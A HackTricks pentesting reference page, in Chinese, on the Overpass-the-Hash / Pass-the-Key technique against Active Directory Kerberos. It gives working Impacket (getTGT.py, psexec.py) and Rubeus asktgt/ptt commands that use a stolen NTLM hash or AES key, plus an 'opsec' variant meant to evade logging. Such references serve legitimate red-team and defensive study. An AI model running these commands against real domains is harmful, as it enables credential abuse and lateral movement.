hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md

4.6 KiB
Raw Blame History

Over Pass the Hash/Pass the Key

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

{% embed url="https://websec.nl/" %}

Overpass The Hash/Pass The Key (PTK)

**Overpass The Hash/Pass The Key (PTK)**攻击旨在针对传统NTLM协议受限且Kerberos认证优先的环境。该攻击利用用户的NTLM哈希或AES密钥来获取Kerberos票据从而未经授权地访问网络中的资源。

要执行此攻击初始步骤涉及获取目标用户帐户的NTLM哈希或密码。在获得此信息后可以获取帐户的票据授予票据TGT使攻击者能够访问用户具有权限的服务或计算机。

该过程可以通过以下命令启动:

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

对于需要使用AES256的情况可以利用-aesKey [AES key]选项。此外获取的票据可以与各种工具一起使用包括smbexec.py或wmiexec.py从而扩大攻击范围。

遇到诸如_PyAsn1Error_或_KDC cannot find the name_等问题通常可以通过更新Impacket库或使用主机名代替IP地址来解决确保与Kerberos KDC兼容。

使用Rubeus.exe的另一种命令序列展示了这种技术的另一个方面

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

这种方法反映了通过密钥传递的方法重点是挪用并直接利用票证进行认证。值得注意的是发起TGT请求会触发事件4768请求了一个Kerberos认证票证TGT默认情况下表示使用RC4-HMAC尽管现代Windows系统更倾向于AES256。

为了符合运行安全性并使用AES256可以应用以下命令

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

参考

{% embed url="https://websec.nl/" %}

从零开始学习 AWS 黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)!